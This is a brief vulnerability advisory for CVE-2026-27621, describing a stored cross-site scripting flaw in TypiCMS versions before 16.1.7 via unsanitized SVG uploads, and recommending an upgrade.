CVE-2026-27621

Name of the Vulnerable Software and Affected Versions TypiCMS versions prior to 16.1.7

Description TypiCMS is a content management system built on the Laravel framework. A stored cross-site scripting (XSS) issue exists in the file upload functionality. The application permits users with file upload privileges to upload SVG files, but it does not properly sanitize the file content despite MIME type validation. An attacker can upload a malicious SVG file containing JavaScript code. When another user views the file, the script executes in their browser, potentially compromising their session. The vulnerability is not mitigated by a 500 error that can occur if the SVG file lacks a viewBox attribute, as attackers can include a valid viewBox attribute in their payload.

Recommendations Update TypiCMS to version 16.1.7 or later.